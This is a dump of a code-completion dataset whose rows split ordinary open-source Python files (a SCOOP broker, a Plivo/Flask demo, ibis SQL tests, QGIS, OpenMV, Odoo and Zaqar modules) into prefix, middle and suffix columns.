repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
richlanc/KaraKara | website/karakara/views/feedback.py | Python | gpl-3.0 | 1,173 | 0.004263 | from pyramid.view import view_config
from externals.lib.misc import strip_non_base_types
from externals.lib.log import log_event
from . import web, action_ok, action_error
from ..model import DBSession
from ..model.model_feedback import Feedback
import logging
log = logging.getLogger(__name__)
@view_config(route_name='feedback')
@web
def feedback_view(request):
"""
Feedback
"""
if request.method == 'GET':
if request.session.get('admin'):
log.info('admin viewed feedback')
return action_ok(data={'feedback': [feedback.to_dict() for feedback in DBSession.query(Feedback)]})
return action_ok()
if not request.params.get('details'):
raise action_error('Please provide feedback details', code=400)
feedback = Feedback()
for fi | eld, value | in request.params.items():
try: setattr(feedback, field,value)
except: pass
feedback.environ = strip_non_base_types(request.environ)
DBSession.add(feedback)
log.info('feedback - {0}'.format(request.params.get('details')))
log_event(request, **request.params)
return action_ok(message='Feedback received, thank you!')
|
IGITUGraz/scoop | scoop/broker/brokerzmq.py | Python | lgpl-3.0 | 15,234 | 0.001313 | #!/usr/bin/env python
#
# This file is part of Scalable COncurrent Operations in Python (SCOOP).
#
# SCOOP is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# SCOOP is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SCOOP. If not, see <http://www.gnu.org/licenses/>.
#
from collections import deque, defaultdict
import time
import zmq
import sys
import copy
import logging
try:
import cPickle as pickle
except ImportError:
import pickle
import scoop
from scoop import TIME_BETWEEN_PARTIALDEBUG, TASK_CHECK_INTERVAL
from .. import discovery, utils
from .structs import BrokerInfo
from .._comm.scoopmessages import *
class LaunchingError(Exception): pass
class Broker(object):
def __init__(self, tSock="tcp://*:*", mSock="tcp://*:*", debug=False,
headless=False, hostname="127.0.0.1"):
"""This function initializes a broker.
:param tSock: Task Socket Address.
Must contain protocol, address and port information.
:param mSock: Meta Socket Address.
Must contain protocol, address and port information.
"""
# Initialize zmq
self.context = zmq.Context(1)
self.debug = debug
self.hostname = hostname
# zmq Socket for the tasks, replies and request.
self.task_socket = self.context.socket(zmq.ROUTER)
self.task_socket.setsockopt(zmq.IPV4ONLY, 0)
self.task_socket.setsockopt(zmq.ROUTER_MANDATORY, 1)
self.task_socket.setsockopt(zmq.LINGER, 1000)
self.t_sock_port = 0
if tSock[-2:] == ":*":
self.t_sock_port = self.task_socket.bind_to_random_port(tSock[:-2])
else:
self.task_socket.bind(tSock)
self.t_sock_port = tSock.split(":")[-1]
# Create identifier for this broker
self.name = "{0}:{1}".format(hostname, self.t_sock_port)
# Initialize broker logging
self.logger = utils.initLogging(2 if debug else 0, name=self.name)
self.logger.handlers[0].setFormatter(
logging.Formatter(
"[%(asctime)-15s] %(module)-9s ({0}) %(levelname)-7s "
"%(message)s".format(self.name)
)
)
# zmq Socket for the pool informations
self.info_socket = self.context.socket(zmq.PUB)
self.info_socket.setsockopt(zmq.IPV4ONLY, 0)
self.info_socket.setsockopt(zmq.LINGER, 1000)
self.info_sock_port = 0
if mSock[-2:] == ":*":
self.info_sock_port = self.info_socket.bind_to_random_port(mSock[:-2])
else:
self.info_socket.bind(mSock)
self.info_sock_port = mSock.split(":")[-1]
self.task_socket.setsockopt(zmq.SNDHWM, 0)
self.task_socket.setsockopt(zmq.RCVHWM, 0)
self.info_socket.setsockopt(zmq.SNDHWM, 0)
self.info_socket.setsockopt(zmq.RCVHWM, 0)
# Init connection to fellow brokers
self.cluster_socket = self.context.socket(zmq.DEALER)
self.cluster_socket.setsockopt(zmq.IPV4ONLY, 0)
self.cluster_socket.setsockopt_string(zmq.IDENTITY, self.getName())
self.cluster_socket.setsockopt(zmq.RCVHWM, 0)
self.cluster_socket.setsockopt(zmq.SNDHWM, 0)
self.cluster_socket.setsockopt(zmq.IMMEDIATE, 1)
self.cluster = []
self.cluster_available = set()
# Init statistics
if self.debug:
self.stats = []
self.lastDebugTs = time.time()
# Two cases are important and must be optimised:
# - The search of unassigned task
# - The search of available workers
# These represent when the broker must deal the communications the
# fastest. Other cases, the broker isn't flooded with urgent messages.
# Initializing the queue of workers and tasks
# The busy worker | s variable will contain a dict (map) of workers: task
self.available_workers = set()
self.unassigned_tasks = deque()
self.assigned_tasks = defaultdict(set)
self.heartbeat_times = {}
self.init_time = time.time()
self.last_task_check_time = time.time()
# Shared variables containing {workerID:{varName:varVal},}
self.shared_variables = defaultdict(dict)
# Start a worker-like communication if needed
self.execQueue = None
| # Handle cloud-like behavior
self.discovery_thread = None
self.config = defaultdict(bool)
self.processConfig({'headless': headless})
def addBrokerList(self, aBrokerInfoList):
"""Add a broker to the broker cluster available list.
Connects to the added broker if needed."""
self.cluster_available.update(set(aBrokerInfoList))
# If we need another connection to a fellow broker
# TODO: only connect to a given number
for aBrokerInfo in aBrokerInfoList:
self.cluster_socket.connect(
"tcp://{hostname}:{port}".format(
hostname=aBrokerInfo.hostname,
port=aBrokerInfo.task_port,
)
)
self.cluster.append(aBrokerInfo)
def processConfig(self, worker_config):
"""Update the pool configuration with a worker configuration.
"""
self.config['headless'] |= worker_config.get("headless", False)
if self.config['headless']:
# Launch discovery process
if not self.discovery_thread:
self.discovery_thread = discovery.Advertise(
port=",".join(str(a) for a in self.getPorts()),
)
def safeTaskSend(self, worker_address, task_id_pickled, task_pickled):
try:
self.task_socket.send_multipart([worker_address, TASK, task_pickled])
except zmq.ZMQError as E:
scoop.logger.warning("Failed to deliver task {0} to address {1}".format(pickle.loads(task_id_pickled), worker_address))
self.unassigned_tasks.append((task_id_pickled, task_pickled))
else:
self.logger.debug("Sent {0} to worker {1}".format(pickle.loads(task_id_pickled), worker_address))
self.assigned_tasks[worker_address].add(task_id_pickled)
def run(self):
"""Redirects messages until a shutdown message is received."""
while True:
if not self.task_socket.poll(-1):
continue
msg = self.task_socket.recv_multipart()
msg_type = msg[1]
# Checking if things are fine with servers and futures
if time.time() - self.last_task_check_time > TASK_CHECK_INTERVAL:
self.last_task_check_time = time.time()
self.checkAssignedTasks()
if self.debug:
self.stats.append((time.time(),
msg_type,
len(self.unassigned_tasks),
len(self.available_workers)))
if time.time() - self.lastDebugTs > TIME_BETWEEN_PARTIALDEBUG:
self.writeDebug("debug/partial-{0}".format(
round(time.time(), -1)
))
self.lastDebugTs = time.time()
# New task inbound
if msg_type == TASK:
task_id = msg[2]
task = msg[3]
self.logger.debug("Received task {0}".format(task_id))
try:
address = self.available_workers.pop()
except KeyError:
self.unassigned_tasks.append((task_id, task))
else:
self.safeTaskSend(address, ta |
kmichal2/plivo | app.py | Python | mit | 7,016 | 0.007127 | import os
from flask import Flask, Response, request, url_for
import psycopg2
import urlparse
import plivo
import plivoxml
AUTH_ID = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
AUTH_TOKEN = 'YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY'
CALLER_ID = '+12345678901'
BOX_ID = '+12345678901'
MY_URL = 'http://morning-ocean-4669.herokuapp.com/report/'
app = Flask(__name__)
@app.route('/response/speak/', methods=['GET'])
def speak():
# Enter the message you want to play
text = "Congratulations! You just made a text to speech app on Plivo cloud!"
parameters = {'loop': 1, 'language': "en-US", 'voice': "WOMAN"}
response = plivoxml.Response()
response.addSpeak(text, **parameters)
return Response(str(response), mimetype='text/xml')
@app.route('/send', methods=['GET', 'POST'])
def send():
# Enter the message you want to send
auth_id = os.environ.get("AUTH_ID", AUTH_ID)
auth_token = os.environ.get("AUTH_TOKEN", AUTH_TOKEN)
caller_id = os.environ.get("CALLER_ID", CALLER_ID)
box_id = os.environ.get("BOX_ID", BOX_ID)
my_url = os.environ.get("MY_URL", MY_URL)
params = {
'src': caller_id, # Sender's phone number with country code
'dst' : box_id, # Receiver's phone Number with country code
'text' : u"Hello, how are you?", # Your SMS Text Message - English
'url' : my_url, # The URL to which with the status of the message is sent
'method' : 'POST' # The method used to call the url
}
if request.method == 'GET':
response = plivoxml.Response()
#response.addSpeak(auth_id + auth_token + caller_id + box_id + my_url)
elif request.method == 'POST':
p = plivo.RestAPI(auth_id, auth_token)
response = p.send_message(params)
return Response(str(response), mimetype='text/xml')
@app.route('/call', methods=['GET', 'POST'])
def call():
# Enter the message you want to send
auth_id = os.environ.get("AUTH_ID", AUTH_ID)
auth_token = os.environ.get("AUTH_TOKEN", AUTH_TOKEN)
caller_id = os.environ.get("CALLER_ID", CALLER_ID)
box_id = os.environ.get("BOX_ID", BOX_ID)
my_url = os.environ.get("MY_URL", MY_URL)
client = request.values.get('client')
params = {
'from': caller_id, # Caller Id
'to' : box_id, # User Number to Call
'answer_url' : my_url+"call",
'time_limit': 80
}
if request.method == 'GET':
response = plivoxml.Response()
response.addSpeak("hello "+client)
#response.addSpeak(auth_id + auth_token + caller_id + box_id + my_url)
#p = plivo.RestAPI(auth_id, auth_token)
#response = p.make_call(params)
elif request.method == 'POST':
response = plivoxml.Response()
response.addSpeak("hello "+client)
#p = plivo.RestAPI(auth_id, auth_token)
#response = p.make_call(params)
return Response(str(response), mimetype='text/xml')
@app.route("/initdb", methods=['GET', 'POST'])
def initdb():
response = plivoxml.Response()
client = request.values.get('client')
if client == None:
return Response(str(response), mimetype='text/xml')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
cur = conn.cursor()
try:
cur.execute("CREATE TABLE IF NOT EXISTS test (id serial PRIMARY KEY, num integer, data varchar);")
cur.execute("INSERT INTO test (num, data) VALUES (%s, %s)", (100, "abc'def"))
cur.execute("SELECT * FROM test;")
response.addSpeak(cur.fetchone())
except Exception, e:
response.addSpeak(e)
cur.close()
conn.commit()
conn.close()
return Response(str(response), mimetype='text/xml')
@app.route("/writedb", methods=['GET', 'POST'])
def writedb():
response = plivoxml.Response()
client = request.values.get('client')
text = request.values.get('text')
if client == None:
return Response(str(response), mimetype='text/xml')
if text == None:
return Response(str(response), mimetype='text/xml')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
cur = conn.cursor()
#cur.execute("UPDATE test SET data = 'abcd' WHERE num = 100;")
try:
SQL = "UPDATE test SET data = %s WHERE num = 100;"
data = (""+text+"",)
cur.execute(SQL, data)
cur.execute("SELECT * FROM test;")
response.addSpeak(cur.fetchone())
except Exception, e:
response.addSpeak(e)
cur.close()
conn.commit()
conn.close()
return Response(str(response), mimetype='text/xml')
@app.route("/readdb", methods=['GET', 'POST'])
def readdb():
response = plivoxml.Response()
client = request.values.get('client')
if client == None:
return Response(str(response), mimetype='text/xml')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
cur = conn.cursor()
try:
cur.execute("SELECT * FROM test;")
response.addSpeak(cur.fetchone())
except Exception, e:
response.addSpeak(e)
cur.close()
conn.close()
return Response(str(response), mimetype='text/xml')
@app.route("/writefile", methods=['GET', 'POST'])
def | writefile():
response = plivoxml.Response()
client = request.values.get('client')
try:
file = open("/tmp/foo.txt", "w")
file. | write('this is a line of text')
file.close()
read_file = open("/tmp/foo.txt", 'r')
text = read_file.read()
read_file.close()
response.addSpeak(text)
except Exception, e:
response.addSpeak(e)
return Response(str(response), mimetype='text/xml')
@app.route("/readfile", methods=['GET', 'POST'])
def readfile():
response = plivoxml.Response()
client = request.values.get('client')
try:
read_file = open("/tmp/foo.txt", 'r')
text = read_file.read()
read_file.close()
response.addSpeak(text)
except Exception, e:
response.addSpeak(e)
return Response(str(response), mimetype='text/xml')
@app.route("/hello", methods=['GET', 'POST'])
def hello():
response = plivoxml.Response()
client = request.values.get('client')
response.addSpeak("hello "+client)
return Response(str(response), mimetype='text/xml')
if __name__ == '__main__':
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
|
dekom/threepress-bookworm-read-only | bookworm/gdata/tests/all_tests_coverage.py | Python | bsd-3-clause | 1,805 | 0.00554 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
__author__ = 'j.s@google.com (Jeff Scudder)'
import unittest
import coverage
import all_tests
import atom.core
import atom.http_core
import atom.mock_http_core
import atom.auth
import atom.client
import gdata.gauth
import gdata.client
import gdata.data
import gdata.blogger.data
import gdata.blogger.client
import gdata.maps.data
import gdata.maps.client
import gdata.spreadsheets.data
from gdata.test_config import settings
# Ensure that coverage tests execute the live requests to the servers, but
# allow use of cached server responses to speed up repeated runs.
settings.RUN_LIVE_TESTS = True
settings.CLEAR_CACHE = False
def suite():
return unittest.TestSuite((atom_tests.core_test.suite(),))
if __name__ == '__main__':
coverage.erase()
coverage.start()
unittest.TextTestRunner().run(all_tests.suite())
coverage.stop()
coverage.report([atom.core, atom.http_core, atom.auth, atom.data,
| atom.mock_http_core, atom.client, gdata.gauth, gdata.client,
gdata.core, gdata.data, gdata.blogger.data, | gdata.blogger.client,
gdata.maps.data, gdata.maps.client, gdata.spreadsheets.data])
|
UdK-VPT/Open_eQuarter | mole/extensions/acqu_berlin/fbinter_wfs_floors_alkis.py | Python | gpl-2.0 | 1,594 | 0.00941 | # -*- coding: utf-8 -*-
from qgis.core import NULL
from mole.project import config
from PyQt4.QtCore import QVariant
def load(self=None):
self.load_wfs()
return True
def evaluation(self=None, parameters={},feature=None):
from mole import oeq_global
result = {'FLOORS': {'type': QVariant.Double,
'value': 3.5}}
if bool(parameters['FLRS_ALK']):
result['FLOORS']['value'] = parameters['FLRS_ALK']
return result
import os
from mole.extensions import OeQExtension
from mole.project import config
extension = OeQExtension(
extension_id=__name__,
category='Import',
subcategory='WFS',
extension_name='Floors (ALKIS, WFS)',
extension_type='information',
field_id='', #used for point sampling tool
par_in=['FLRS_ALK', 'BSMTS_ALK'], #config.building_id_key,
#field_rename= {"AnzahlDerO" : "FLRS_ALK", "AnzahlDerU" : "BSMTS_ALK"},
source_type='wfs',
layer_name='Floors ( | WFS Capture)',
sourcelayer_name='Floors (WFS Capture)',
targetlayer_name=config.data_layer_name,
active=False,
description=u'',
#source='http://fbinter.stadt-berlin.de/fb/wfs/geometry/senstadt/re_alkis_gebaeude?SERVICE=WFS&VERSION=1.0.0&REQUEST=GetFeature&TYPENAME=fis:re_alkis_gebaeude&SRSNAME=EPSG:25833',
source_crs='EPSG:25833',
extension_filepath=os.path.join(__file__),
colortable = os.path.join(os.path.splitext(__file__)[0] + '.qml'),
load_method=load,
prefligh | t_method=None,
evaluation_method=evaluation,
postflight_method=None)
extension.registerExtension(default=True)
|
openmv/openmv | scripts/examples/OpenMV/04-Image-Filters/grayscale_bilateral_filter.py | Python | mit | 1,399 | 0.009292 | # Grayscale Bilteral Filter Example
#
# This example shows off using the bilateral filter on grayscale images.
import sensor, image, time
sensor.reset() # Initialize the camera sensor.
sensor.set_pixformat(sensor.GRAYSCALE) # or sensor.RGB565
sensor.set_framesize(sensor.QQVGA) # or sensor.QVGA (or others)
sensor.skip_frames(time = 2000) # Let new settings take affect.
clock = time.clock() # Tracks FPS.
while(True):
clock.tick() # Track elapsed milliseconds between snapshots().
img = sensor.snapshot() # Take a picture and return the image.
# color_sigma controls how close color wise pixels have to be to each other to be
# blured togheter. A smaller value means they have to be closer.
# A larger value is less strict.
# space_sigma controls how close space wise pixels have to be to each other to be
# blured togheter. A smaller value means they have to be closer.
# A larger value is less strict.
# Run the kernel on every pixel of the image.
img.bilateral(3, color_sigma=0.1, s | pace_sigma=1)
# Note that the bilateral filter can introduce image defects if you set
# color_sigma/spac | e_sigma to aggresively. Increase the sigma values until
# the defects go away if you see them.
print(clock.fps()) # Note: Your OpenMV Cam runs about half as fast while
# connected to your computer. The FPS should increase once disconnected.
|
sostenibilidad-unam/posgrado | posgradmin/posgradmin/migrations/0040_auto_20191120_2258.py | Python | gpl-3.0 | 484 | 0.002066 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2019-11-21 04:58
from __future__ import uni | code_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
( | 'posgradmin', '0039_auto_20191120_2249'),
]
operations = [
migrations.AlterModelOptions(
name='profesor',
options={'ordering': ['user__first_name', 'user__last_name'], 'verbose_name_plural': 'Profesores'},
),
]
|
jeffery9/mixprint_addons | ineco_kpi/crm_lead.py | Python | agpl-3.0 | 1,871 | 0.003741 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from base_status.base_stage import base_stage
import crm
from datetime import datetime
from dateutil.relativedelta import relativedelta
from osv import fields, osv
import time
import tools
from tools.translate import _
from tools import html2plaintext
from base.res.res_partner import format_address
class crm_lead(osv.osv):
_description = "Lead/Opportunity"
_inherit = "crm.lead"
def create(self, cr, uid, vals, context=None):
if 'date_deadline' not in vals:
date_ref = datetime.now().strftime('%Y-%m-%d')
next_date = (datetime.strptime(dat | e_ref, '%Y-%m-%d') + relativedelta(days=30))
vals.update({'date_deadline': next_date.strftime('%Y-%m-%d')})
| return super(crm_lead, self).create(cr, uid, vals, context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
equitania/myodoo-addons-v10 | eq_website_quote/__init__.py | Python | agpl-3.0 | 1,002 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# Odoo Addon, Open Source Management Solution
# Copyright (C) 2014-now Equitania Software GmbH(<http://www.equitania.de>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This p | rogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more det | ails.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
|
cpcloud/ibis | ibis/tests/sql/test_select_sql.py | Python | apache-2.0 | 33,419 | 0 | import pytest
import ibis
from ibis.backends.base.sql.compiler import Compiler
from .conftest import get_query
def test_nameless_table():
# Generate a unique table name when we haven't passed on
nameless = ibis.table([('key', 'string')])
assert Compiler.to_sql(nameless) == 'SELECT *\nFROM {}'.format(
nameless.op().name
)
with_name = ibis.table([('key', 'string')], name='baz')
result = Compiler.to_sql(with_name)
assert result == 'SELECT *\nFROM baz'
def test_physical_table_reference_translate(alltypes):
result = Compiler.to_sql(alltypes)
expected = "SELECT *\nFROM alltypes"
assert result == expected
def test_simple_joins(star1, star2):
t1 = star1
t2 = star2
pred = t1['foo_id'] == t2['foo_id']
pred2 = t1['bar_id'] == t2['foo_id']
cases = [
(
t1.inner_join(t2, [pred])[[t1]],
"""SELECT t0.*
FROM star1 t0
INNER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`""",
),
(
t1.left_join(t2, [pred])[[t1]],
"""SELECT t0.*
FROM star1 t0
LEFT OUTER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`""",
),
(
t1.outer_join(t2, [pred])[[t1]],
"""SELECT t0.*
FROM star1 t0
FULL OUTER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`""",
),
# multiple predicates
(
t1.inner_join(t2, [pred, pred2])[[t1]],
"""SELECT t0.*
FROM star1 t0
INNER JOIN star2 t1
ON (t0.`foo_id` = t1.`foo_id`) AND
(t0.`bar_id` = t1.`foo_id`)""",
),
]
for expr, expected_sql in cases:
result_sql = Compiler.to_sql(expr)
assert result_sql == expected_sql
def test_multiple_joins(multiple_joins):
what = multiple_joins
result = Compiler.to_sql(what)
expected = """\
SELECT *, `value1`, t1.`value2`
FROM (
SELECT t2.`c`, t2.`f`, t2.`foo_id` AS `foo_id_x`, t2.`bar_id`,
t3.`foo_id` AS `foo_id_y`, t3.`value1`, t3.`value3`
FROM star1 t2
LEFT OUTER JOIN star2 t3
ON t2.`foo_id` = t3.`foo_id`
) t0
INNER JOIN star3 t1
ON `bar_id` = t1.`bar_id`"""
assert result == expected
def test_join_between_joins(join_between_joins):
projected = join_between_joins
result = Compiler.to_sql(projected)
expected = """\
SELECT t0.*, t1.`value3`, t1.`value4`
FROM (
SELECT t2.*, t3.`value2`
FROM `first` t2
INNER JOIN second t3
ON t2.`key1` = t3.`key1`
) t0
INNER JOIN (
SELECT t2.*, t3.`value4`
FROM third t2
INNER JOIN fourth t3
ON t2.`key3` = t3.`key3`
) t1
ON t0.`key2` = t1.`key2`"""
assert result == expected
def test_join_just_materialized(join_just_materialized):
joined = join_just_materialized
result = Compiler.to_sql(joined)
expected = """SELECT *
FROM tpch_nation t0
INNER JOIN tpch_region t1
ON t0.`n_regionkey` = t1.`r_regionkey`
INNER JOIN tpch_customer t2
ON t0.`n_nationkey` = t2.`c_nationkey`"""
assert result == expected
result = Compiler.to_sql(joined)
assert result == expected
def test_semi_anti_joins(semi_anti_joins):
sj, aj = semi_anti_joins
result = Compiler.to_sql(sj)
expected = """SELECT t0.*
FROM star1 t0
LEFT SEMI JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`"""
assert result == expected
result = Compiler.to_sql(aj)
expected = """SELECT t0.*
FROM star1 t0
LEFT ANTI JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`"""
assert result == expected
def test_self_reference_simple(self_reference_simple):
expr = self_reference_simple
result_sql = Compiler.to_sql(expr)
expected_sql = "SELECT *\nFROM star1"
assert result_sql == expected_sql
def test_join_self_reference(self_reference_join):
result = self_reference_join
result_sql = Compiler.to_sql(result)
expected_sql = """SELECT t0.*
FROM star1 t0
INNER JOIN star1 t1
ON t0.`foo_id` = t1.`bar_id`"""
assert result_sql == expected_sql
def test_join_projection_subquery_broken_alias(join_projection_subquery_bug):
expr = join_projection_subquery_bug
result = Compiler.to_sql(expr)
expected = """SELECT t1.*, t0.*
FROM (
SELECT t2.`n_nationkey`, t2.`n_name` AS `nation`, t3.`r_name` AS `region`
FROM tpch_nation t2
INNER JOIN tpch_region t3
ON t2.`n_regionkey` = t3.`r_regionkey`
) t0
INNER JOIN tpch_customer t1
ON t0.`n_nationkey` = t1.`c_nationkey`"""
assert result == expected
def test_where_simple_comparisons(where_simple_comparisons):
what = where_simple_comparisons
result = Compiler.to_sql(what)
expected = """SELECT *
FROM star1
WHERE (`f` > 0) AND
(`c` < (`f` * 2))"""
assert result == expected
def test_where_with_join(where_with_join):
e1 = where_with_join
expected_sql = """SELECT t0.*, t1.`value1`, t1.`value3`
FROM star1 t0
INNER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`
WHERE (t0.`f` > 0) AND
(t1.`value3` < 1000)"""
result_sql = Compiler.to_sql(e1)
assert result_sql == expected_sql
def test_where_no_pushdown_possible(star1, star2):
t1 = star1
t2 = star2
joined = t1.inner_join(t2, [t1.foo_id == t2.foo_id])[
t1, (t1.f - t2.value1).name('diff')
]
filtered = joined[joined.diff > 1]
expected_sql = """\
SELECT t0.*
FROM (
SELECT t1.*, t1.`f` - t2.`value1` AS `diff`
FROM star1 t1
INNER JOIN star2 t2
ON t1.`foo_id` = t2.`foo_id`
) t0
WHERE t0.`diff` > 1"""
result_sql = Compiler.to_sql(filtered)
assert result_sql == expected_sql
def test_where_with_between(alltypes):
t = alltypes
what = t.filter([t.a > 0, t.f.between(0, 1)])
result = Compiler.to_sql(what)
expected = """SELECT *
FROM alltypes
WHERE (`a` > 0) AND
(`f` BETWEEN 0 AND 1)"""
assert result == expected
def test_where_analyze_scalar_op(functional_alltypes):
# root cause of #310
table = functional_alltypes
expr = table.filter(
[
table.timestamp_col
< (ibis.timestamp('2010-01-01') + ibis.interval(months=3)),
table.timestamp_col < (ibis.now() + ibis.interval(days=10)),
]
).count()
result = Compiler.to_sql(expr)
expected = """\
SELECT count(*) AS `count`
FROM functional_alltypes
WHERE (`timestamp_col` < date_add(cast({} as timestamp), INTERVAL 3 MONTH)) AND
(`timestamp_col` < date_add(cast(now() as timestamp), INTERVAL 10 DAY))""" # noqa: E501
assert result == expected.format("'2010-01-01 00:00:00'")
def test_bug_duplicated_where(airlines):
# GH #539
table = airlines
t = table['arrdelay', 'dest']
expr = t.group_by('dest').mutate(
dest_avg=t.arrdelay.mean(), dev=t.arrdelay - t.arrdelay.mean()
)
tmp1 = expr[expr.dev.notnull()]
tmp2 = tmp1.sort_by(ibis.desc('dev'))
worst = tmp2.limit(10)
result = Compiler.to_sql(worst)
expected = """\
SELECT *
FROM (
SELECT t1.*
FROM (
SELECT *, avg(`arrdelay`) OVER (PARTITION BY `dest`) AS `dest_avg`,
`arrdelay` - avg(`arrdelay`) OVER (PARTITION BY `dest`) AS `dev`
FROM (
SELECT `arrdelay`, `dest`
FROM airlines
) t3
) t1
WHERE t1.`dev` IS NOT NULL
) t0
ORDER BY `dev` DESC
LIMIT 10"""
assert result == expected
@pytest.mark.parametrize(
("expr_fn", "expected"),
[
pytest.param(
lambda t: t.aggregate([t['f'].sum().name('total')], [t['foo_id']]),
"""SELECT `foo_id`, sum(`f`) AS `total`
FROM star1
GROUP BY 1""",
| id="explicit_column",
),
| pytest.param(
lambda t: t.aggregate(
[t['f'].sum().name('total')], ['foo_id', 'bar_id']
),
"""SELECT `foo_id`, `bar_id`, sum(`f`) AS `total`
FROM star1
GROUP BY 1, 2""",
id="string_columns",
),
],
)
def test_simple_aggregate_query(star1, expr_fn, expected):
expr = expr_fn(star1)
result = Compiler.to_sql(expr)
assert result == expected
def test_aggregate_having(aggregate_having):
e1, e2 = aggregate_having
result = Compiler.to_sql(e1)
expected = """SELECT `foo_id`, sum(`f`) AS `total`
FROM star1
GROUP BY 1
HAVING sum(` |
openstack/python-zaqarclient | zaqarclient/queues/v1/message.py | Python | apache-2.0 | 2,204 | 0 | # Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a message controller that understands Zaqar messages."""
from zaqarclient.queues.v1 import core
class Message(object):
"""A handler for Zaqar server Message resources.
Attributes are only downloaded once - at creation time.
"""
def __init__(self, queue, ttl, age, body, href=None, id=None,
claim_id=None, claim_count=0, checksum=None):
self.queue = queue
self.href = href
self.ttl = ttl
self.age = age
self.body = body
sel | f.claim_count = claim_count
self.checksum = checksum
# NOTE(flaper87): Is this really
# necessary? Should this be returned
# by Zaqar?
# The url has two forms depending on if it has been claimed.
# /v1/queues/worker-jobs/messages/5c6939a8?claim_id=63c9a592
# or
# /v1/queues/worker-jobs/messages/5c6939a8
if id is None:
self._id = href.split('/')[-1]
if '?' in self._id:
self._id = | self._id.split('?')[0]
else:
self._id = id
def __repr__(self):
return '<Message id:{id} ttl:{ttl}>'.format(id=self._id,
ttl=self.ttl)
@property
def claim_id(self):
if '=' in self.href:
return self.href.split('=')[-1]
def delete(self):
req, trans = self.queue.client._request_and_transport()
core.message_delete(trans, req, self.queue._name,
self._id, self.claim_id)
def create_object(parent):
return lambda args: Message(parent, **args)
|
joferkington/numpy | numpy/core/tests/test_multiarray.py | Python | bsd-3-clause | 242,380 | 0.000772 | from __future__ import division, absolute_import, print_function
import collections
import tempfile
import sys
import shutil
import warnings
import operator
import io
import itertools
import ctypes
import os
if sys.version_info[0] >= 3:
import builtins
else:
import __builtin__ as builtins
from decimal import Decimal
import numpy as np
from numpy.compat import asbytes, getexception, strchar, unicode, sixu
from test_print import in_foreign_locale
from numpy.core.multiarray_tests import (
test_neighborhood_iterator, test_neighborhood_iterator_oob,
test_pydatamem_seteventhook_start, test_pydatamem_seteventhook_end,
test_inplace_increment, get_buffer_info, test_as_c_array,
)
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises,
assert_equal, assert_almost_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose,
assert_array_less, runstring, dec, SkipTest, temppath
)
# Need to test an object that does not fully implement math interface
from datetime import timedelta
if sys.version_info[:2] > (3, 2):
